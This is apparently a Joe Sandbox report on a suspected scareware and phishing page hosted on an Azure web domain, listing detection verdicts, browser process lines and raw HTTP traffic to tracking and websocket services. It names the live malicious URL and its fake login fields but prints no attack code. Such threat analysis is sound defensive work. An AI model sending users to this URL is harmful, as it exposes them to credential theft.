Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE

Overview

General Information

Sample URL:https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE
Analysis ID:1564528
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Detected clear text password fields (password is not hidden)

Classification

  • System is w10x64
  • chrome.exe (PID: 5932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4084 --field-trial-handle=2444,i,7551787297892426440,14419496733088316111,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwESlashNext: detection malicious, Label: Scareware type: Phishing & Social Engineering

Phishing

barindex
Source: https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwEJoe Sandbox AI: Score: 7 Reasons: The URL 'ddbsodvnnadewe.z1.web.core.windows.net' is hosted on a Microsoft Azure domain, which is a legitimate cloud service provider., The brand 'Microsoft' is well-known and commonly associated with the domain 'microsoft.com'., The subdomain 'ddbsodvnnadewe' does not clearly indicate any known Microsoft service or product, which raises suspicion., The use of a generic Azure domain with an unclear subdomain could be a tactic to disguise a phishing attempt., The presence of input fields for 'Nutzername' and 'Passwort' suggests a login page, which is a common target for phishing. DOM: 1.0.pages.csv
Source: https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwEHTTP Parser: <input type="text"... for password input
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /core/lo.js?site-id=f6f3e602 HTTP/1.1Host: tools.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ddbsodvnnadewe.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZhsWdDdL2+UeRUR&MD=BZCYPKHf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /core/lo.js?site-id=f6f3e602 HTTP/1.1Host: tools.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/nb9vpk5smt HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ddbsodvnnadewe.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /get/script.js?referrer=https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE HTTP/1.1Host: userstatics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ddbsodvnnadewe.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/nb9vpk5smt HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
Source: global trafficHTTP traffic detected: GET /f6f3e602 HTTP/1.1Host: settings.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-lucky-referrer: sec-ch-ua-mobile: ?0x-lucky-uid: undefinedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ddbsodvnnadewe.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /get/script.js?referrer=https://ddbsodvnnadewe.z1.web.core.windows.net/?gad_source=5&gclid=EAIaIQobChMI4taSwu7-iQMVTvE7Ah3nKQf9EAEYASAAEgK2EvD_BwE HTTP/1.1Host: userstatics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /f6f3e602 HTTP/1.1Host: settings.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /core/core.js?v=49d958c HTTP/1.1Host: tools.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ddbsodvnnadewe.z1.web.core.windows.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/0.7.56/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ddbsodvnnadewe.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
Source: global trafficHTTP traffic detected: GET /s/0.7.56/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=185a6c8731cc4b10811644b6f0bc1620.20241128.20251128
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: cgPcJp3GuzBH0JIAyLLTuA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /mqtt HTTP/1.1Host: realtime.luckyorange.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: HePntTmWhOmsxw9TwI0Ohw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: mqtt
Source: global trafficHTTP traffic detected: GET /core/core.js?v=49d958c HTTP/1.1Host: tools.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mqtt HTTP/1.1Host: realtime.luckyorange.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: XsAUca22kKAxjk88gNVRdw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: mqttv3.1
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 4iBiNZCn2iQXHKyCfBXezA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"413-wEen2qDwxX9FaG3v37d7TaXDwUk"
Source: global trafficHTTP traffic detected: GET /public-auth HTTP/1.1Host: api-preview.luckyorange.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"413-Mj4R8EuWpWVzT0yBs9ngbwMNmXs"
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: hdq/VhhAJjga6bjkBN8FrA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: rfn1xd3EcB3ERDQXqgiB/Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: L43HKMTcbwZEG1kofVSghA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZhsWdDdL2+UeRUR&MD=BZCYPKHf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ZTOfK3prcbA3C0nzoINE6g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=3&transport=websocket HTTP/1.1Host: in.visitors.liveConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://ddbsodvnnadewe.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: jGp9V4/7nsklKlz9mBYRlw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
